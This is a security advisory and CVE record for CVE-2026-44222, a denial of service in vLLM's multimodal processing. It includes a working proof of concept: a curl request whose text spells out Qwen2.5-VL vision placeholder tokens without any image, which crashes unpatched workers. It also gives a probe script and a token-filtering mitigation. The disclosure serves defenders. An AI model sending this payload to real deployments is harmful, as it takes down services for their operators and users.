vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0.
vLLM: Remote DoS via Special-Token Placeholders
Problem type
CWE-129: Improper Validation of Array Index
Affected products
vllm-project/vllm
>= 0.6.1, < 0.20.0 - AFFECTED
References
https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f
https://github.com/vllm-project/vllm/issues/32656
GitHub Security Advisories
GHSA-hpv8-x276-m59f
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
https://github.com/advisories/GHSA-hpv8-x276-m59f
Summary
This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
Details
- Affected component: multimodal input position computation.
- File/functions (paths are indicative):
- vllm/model_executor/layers/rotary_embedding.py
- get_input_positions_tensor(...)
- _vl_get_input_positions_tensor(...)
- Failure mechanism:
- The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
- When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context):
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
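The failure mode can be reproduced in isolation: indexing an empty grid list with any index raises IndexError, which a bounds check would turn into a clean request-level rejection. The helper names below are hypothetical, for illustration only; they are not vLLM's actual code or its fix.

```python
# Minimal illustration of the failure mode (hypothetical helper names):
# placeholder tokens were counted in the prompt, but the grid list
# supplied alongside them is empty because no media was attached.

def get_grid_dims(grid_thw, index):
    """Unchecked access, mirroring the vulnerable pattern."""
    return grid_thw[index][0], grid_thw[index][1], grid_thw[index][2]

def get_grid_dims_checked(grid_thw, index):
    """Bounds-checked variant: reject placeholder tokens without data."""
    if index >= len(grid_thw):
        raise ValueError(
            f"placeholder token #{index} has no matching grid entry "
            f"(got {len(grid_thw)} entries)"
        )
    return get_grid_dims(grid_thw, index)

video_grid_thw = []  # text-only request: no video payload was supplied

try:
    get_grid_dims(video_grid_thw, 0)
except IndexError as e:
    print(f"unhandled in vulnerable versions: {e}")

try:
    get_grid_dims_checked(video_grid_thw, 0)
except ValueError as e:
    print(f"rejected cleanly: {e}")
```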
Abbreviated call path:
OpenAI API request
→ vllm.v1.engine.core: step/execute_model
→ vllm.v1.worker.gpu_model_runner: _update_states/execute_model
→ vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
→ _vl_get_input_positions_tensor
→ IndexError: list index out of range
PoC
Environment
- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000
Request (text-only, no image/video data)
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>"
        }
      ]
    }
  ]
}
JSON
curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json
Observed result
- HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
- In some deployments, the worker exits and capacity remains reduced until manual restart.
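For automated checking, the PoC request can be wrapped in a short standard-library probe. This is a sketch, not part of the advisory's tooling; it assumes the server from the PoC environment is listening on the given base URL.

```python
# Hypothetical probe: send the placeholder-only prompt and report the
# HTTP status the server answers with (a 5xx suggests the vulnerable
# code path was hit). Standard library only.
import json
import urllib.error
import urllib.request

def build_probe_payload(model):
    """Payload mirroring the PoC request: placeholder tokens, no image."""
    return {
        "model": model,
        "messages": [
            {
                "role": "user",
                "content": [
                    {"type": "text",
                     "text": "what's in picture "
                             "<|vision_start|><|image_pad|><|vision_end|>"},
                ],
            }
        ],
    }

def probe(base_url, model):
    """Return the HTTP status code the server responds with."""
    req = urllib.request.Request(
        f"{base_url}/v1/chat/completions",
        data=json.dumps(build_probe_payload(model)).encode(),
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code
```

Example: `probe("http://127.0.0.1:8000", "Qwen/Qwen2.5-VL-3B-Instruct")` returning a 500 matches the observed result above.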
Impact
- Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
- Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
Fixes
- Upgrade to vLLM 0.20.0 or later.
- Changes associated with https://github.com/vllm-project/vllm/issues/32656
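Until the upgrade is applied, deployments that front vLLM with a proxy could reject text-only requests that smuggle vision placeholder tokens. The sketch below is a hypothetical pre-filter, not an official mitigation; the token strings are the Qwen2.5-VL markers used in the PoC, and other VLMs use different markers.

```python
# Hypothetical pre-filter for an OpenAI-compatible proxy: flag requests
# whose user text spells vision placeholder tokens while the message
# carries no image/video parts. Token strings assumed from Qwen2.5-VL.

SPECIAL_TOKENS = (
    "<|vision_start|>", "<|image_pad|>", "<|video_pad|>", "<|vision_end|>",
)

def is_suspicious(messages):
    """True if any text part spells a vision token without media parts."""
    for msg in messages:
        content = msg.get("content")
        if isinstance(content, str):
            parts = [{"type": "text", "text": content}]
        else:
            parts = content or []
        has_media = any(
            p.get("type") in ("image_url", "video_url") for p in parts
        )
        for p in parts:
            if p.get("type") == "text" and any(
                t in p.get("text", "") for t in SPECIAL_TOKENS
            ):
                if not has_media:
                    return True
    return False
```

A stricter variant would also compare the number of placeholder sequences against the number of attached media parts, since a count mismatch triggers the same out-of-range indexing.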
Credits
Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-44222
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-44222",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-05-12T19:57:25.336Z",
"dateReserved": "2026-05-05T15:42:40.518Z",
"datePublished": "2026-05-12T19:57:25.336Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-05-12T19:57:25.336Z"
},
"title": "vLLM: Remote DoS via Special-Token Placeholders",
"descriptions": [
{
"lang": "en",
"value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."
}
],
"affected": [
{
"vendor": "vllm-project",
"product": "vllm",
"versions": [
{
"version": ">= 0.6.1, < 0.20.0",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-129: Improper Validation of Array Index",
"cweId": "CWE-129",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f",
"name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/vllm-project/vllm/issues/32656",
"name": "https://github.com/vllm-project/vllm/issues/32656",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
}
}
]
}
}
}